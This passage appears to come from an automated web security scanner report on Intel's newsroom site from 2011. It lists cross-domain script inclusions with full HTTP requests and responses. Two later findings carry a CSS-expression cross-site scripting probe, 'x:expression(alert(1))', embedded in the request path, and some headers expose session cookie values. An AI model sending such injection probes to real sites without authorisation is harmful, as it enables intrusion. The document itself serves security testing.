s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:37 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313936303b33382c313931393b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031313b31342c323031363b31342c323030373b31342c323031303b31342c323032353b31342c323030343b31342c323030353b; Expires=Mon, 07-Mar-2011 23:14:38 GMT; Path=/
X-JAL: 151
Content-Language: en-US
CacheHit: D=159108 t=1296947677046883
X-JSL: D=159113 t=1296947677046883
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.59. http://newsroom.intel.com/community/es_es  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/es_es

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://twitter.com/javascripts/blogger.js
  • http://twitter.com/statuses/user_timeline/intel_spain.json?callback=twitterCallback2&count=5
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /community/es_es HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:38 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313538363b33382c313931393b33382c313936303b33382c313935393b33382c313934363b33382c313936333b31342c323030363b31342c323032373b31342c323031363b31342c323030343b31342c323030373b31342c323031313b31342c323031303b31342c323032353b31342c323030353b; Expires=Mon, 07-Mar-2011 23:14:40 GMT; Path=/
X-JAL: 227
Content-Language: en-US
CacheHit: D=241142 t=1296947678563509
X-JSL: D=241148 t=1296947678563509
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</div><script src="http://twitter.com/javascripts/blogger.js" type="text/javascript"></script><script src="http://twitter.com/statuses/user_timeline/intel_spain.json?callback=twitterCallback2&amp;count=5" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.60. http://newsroom.intel.com/community/feeds  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/feeds

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /community/feeds HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:24 GMT
Server: Apache
X-JAL: 7
Content-Language: en-US
CacheHit: D=18628 t=1296947664936703
X-JSL: D=18633 t=1296947664936703
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.61. http://newsroom.intel.com/community/intel_newsroom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /community/intel_newsroom?view=tags&tags=2nd_generation_core&recursive=false HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:23 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313934363b33382c313936303b33382c313935393b33382c313936333b33382c313931393b33382c313538363b31342c323031363b31342c323032353b; Expires=Mon, 07-Mar-2011 23:14:25 GMT; Path=/
X-JAL: 179
Content-Language: en-US
CacheHit: D=190363 t=1296947663359176
X-JSL: D=190368 t=1296947663359176
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.62. http://newsroom.intel.com/community/intel_newsroom/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /community/intel_newsroom/?iid=ftr+press HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/about/index.htm?iid=gg_about-en_US+intel_aboutintel
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:11:09 GMT
Server: Apache
Set-Cookie: JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; Domain=.intel.com; Path=/
Set-Cookie: jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323031363b; Expires=Mon, 07-Mar-2011 23:11:11 GMT; Path=/
X-JAL: 613
Content-Language: en-US
CacheHit: D=624946 t=1296947469127528
X-JSL: D=624952 t=1296947469127528
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.63. http://newsroom.intel.com/community/intel_newsroom/blog/2010/10/19/intel-announces-multi-billion-dollar-investment-in-next-generation-manufacturing-in-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2010/10/19/intel-announces-multi-billion-dollar-investment-in-next-generation-manufacturing-in-us

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /community/intel_newsroom/blog/2010/10/19/intel-announces-multi-billion-dollar-investment-in-next-generation-manufacturing-in-us HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:17 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313538363b33382c313934363b33382c313936333b33382c313936303b33382c313935393b33382c313931393b31342c323032353b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:19 GMT; Path=/
X-JAL: 138
Content-Language: en-US
CacheHit: D=146166 t=1296947657370210
X-JSL: D=146172 t=1296947657370210
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.64. http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/26/forty-young-innovators-named-intel-science-talent-search-2011-finalists  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2011/01/26/forty-young-innovators-named-intel-science-talent-search-2011-finalists

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /community/intel_newsroom/blog/2011/01/26/forty-young-innovators-named-intel-science-talent-search-2011-finalists HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:14 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313931393b33382c313935393b33382c313936333b33382c313538363b33382c313936303b33382c313934363b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:16 GMT; Path=/
X-JAL: 79
Content-Language: en-US
CacheHit: D=88390 t=1296947654948936
X-JSL: D=88395 t=1296947654948936
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.65. http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51"style="x:expression(alert(1))"f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2011/0176c51"style="x:expression(alert(1))"f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
  • http://www.google.com/buzz/api/button.js

Request

GET /community/intel_newsroom/blog/2011/0176c51"style="x:expression(alert(1))"f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://burp/show/14
Accept-Language: en-US
Cookie: JSESSIONID=78E12C4CBC31892852D8659ED77D7E3B.node7IPR; wa_visitId=%7Bf2a84205-6e62-e72c-945c-67c55cb850af%7D; s_cc=true; cmp_cookie=rss-258152-c1-264093; s_lv=1296957489568; s_lv_s=First%20Visit; cf=1; gpv_p18=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A70009050119C8-40000115E040587E[CE]; INTELHistoryTracker=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business%3Fcid%3Drss-258152-c1-264093:Error; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; __utma=174403261.1366145624.1296957487.1296957487.1296957487.1; __utmb=174403261.1.10.1296957487; __utmc=174403261; __utmz=174403261.1296957487.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Pragma: no-cache
Host: newsroom.intel.com

Response

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 01:56:58 GMT
Server: Apache
X-JAL: 17
Content-Language: en-US
CacheHit: D=26518 t=1296957418334302
X-JSL: D=26524 t=1296957418334302
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
</script>
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
<script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...

18.66. http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://widgets.digg.com/buttons.js
